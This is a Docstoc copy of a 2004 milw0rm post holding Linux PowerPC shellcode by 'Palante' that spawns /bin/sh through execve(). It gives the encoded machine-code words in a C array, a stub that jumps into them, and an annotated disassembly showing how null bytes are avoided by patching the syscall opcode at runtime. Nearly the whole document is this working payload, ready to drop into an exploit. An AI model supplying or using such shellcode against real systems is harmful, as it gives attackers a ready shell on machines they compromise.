Docstoc
EXCLUSIVE OFFER FOR DOCSTOC USERS
Try the all-new QuickBooks Online for FREE.  No credit card required.

linuxppc execve binsh 112 bytes

Document Sample
linuxppc execve binsh 112 bytes Powered By Docstoc
					                                            linuxppc execve binsh 112 bytes                 Page 1/2
   1   /*
   2    * Linux PPC shellcode
   3    * execve() of /bin/sh by Palante
   4    */
   5
   6   long shellcode[] = { /* Palante’s linuxPPC shellcode w/ NULL*/
   7      0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6,
   8      0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
   9      0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
  10      0x7CC419AE, 0x7C042A14, 0x7CE72850, 0x7C852A14,
  11      0x7C63212E, 0x7C832214, 0x7CC5212E, 0x7CA52A78,
  12      0x44FFFF02, 0x7CE03B78, 0x44FFFF02, 0x4BFFFFB1,
  13      0x2F62696E, 0x2F73685A, 0xFFFFFFFF, 0xFFFFFFFF
  14   };
  15
  16
  17   void main()
  18   {
  19     __asm__("b shellcode");
  20   }
  21
  22   /*                 disassembly
  23
  24           .section ".text"         # Palante’s LinuxPPC shellcode
  25           .align 2
  26           .globl m
  27           .type    m,@function
  28      m:
  29            xor 6,6,6             # r6 is 0
  30            cmpi 7,0,6,0x7FFF     # do meaningless compare
  31          bc 13,28,L2           # conditional branch to L2 − CAUSES NULL BYTE
  32      L1: mfspr 3,8           # address of /bin/sh into r3 (execve parameter)
  33
  34            sth    6,−7(3)           # fix sc opcode
  35            sth    6,−15(3)          # fix sc opcode
  36
  37            addi   4,6,0x7FF0
  38            addi   5,6,0x7FF4
  39            addi   7,6,0x7FF3
  40            xor    5,5,4             #got 0x4 into r5
  41            xor    7,7,4             #got 0x3 into r7
  42
  43
  44            add 4,5,7                # r4 = 0x7
  45            stbx 6,4,3               # store null after /bin/sh
  46
  47             add 0,4,5                # this makes 11 which is the execve system call
  48           sub 7,5,7                # r7 = 0x1 for exit system call
  49
  50           add 4,5,5                # r4 = 0x8
  51           stwx 3,3,4               # and store pointer to /bin/sh at r3+0x8
  52             add 4,3,4                # r4 = r3 + 0x8 (execve parameter)
Palante                                                                                     09/12/2004
                                         linuxppc execve binsh 112 bytes       Page 2/2
  53            stwx 6,5,4             # store NULL pointer
  54          xor 5,5,5              # NULL (execve parameter)
  55          .long   0x44ffff02     # not quite an sc opcode
  56            or 0,7,7               # syscall 1 − exit
  57          .long   0x44ffff02     # not quite an sc opcode
  58
  59    L2:   bl L1                  # branch and link back to L1
  60          .long   0x2F62696E     #/bin/shZ
  61          .long   0x2F73685A
  62          .long   0xffffffff     # this is where pointer to /bin/sh goes
  63          .long   0xffffffff     # this is where null pointer goes
  64
  65    .Lfe1:
  66     .size     m,.Lfe1−m
  67
  68   */
  69
  70   // milw0rm.com [2004−09−12]




Palante                                                                        09/12/2004

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:37
posted:5/23/2010
language:English
pages:2